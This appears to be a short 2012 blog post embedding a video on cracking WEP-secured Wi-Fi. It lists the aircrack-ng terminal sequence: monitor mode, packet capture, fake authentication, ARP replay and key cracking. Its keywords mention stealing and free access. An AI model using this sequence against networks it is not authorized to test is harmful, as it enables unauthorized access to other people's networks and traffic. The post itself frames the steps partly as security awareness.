Thursday, May 24, 2012

How To Hack Wireless

How To Hack Wireless Tube. Duration : 4.22 Mins.


This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless. WEBSITES: www.backtrack-linux.org http TERMINAL COMMANDS: Startx /etc/init.d/networking start airmon-ng airmon-ng stop [wireless card name] airmon-ng start [wireless card name] airmon-ng airodump-ng [wireless card name] ctrl c airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name] aireplay-ng -1 0 a [bssid] [wireless card name] aireplay-ng -3 b [bssid][wireless card name] ctrl + c dir aircrack-ng [filename]

Keywords: hack, wireless, backtrack, wep, hacking, linux, steal, wpa, wpa2, protect, free, protection, hackers, tips, tricks, tutorial, tinkernut

No comments:

Post a Comment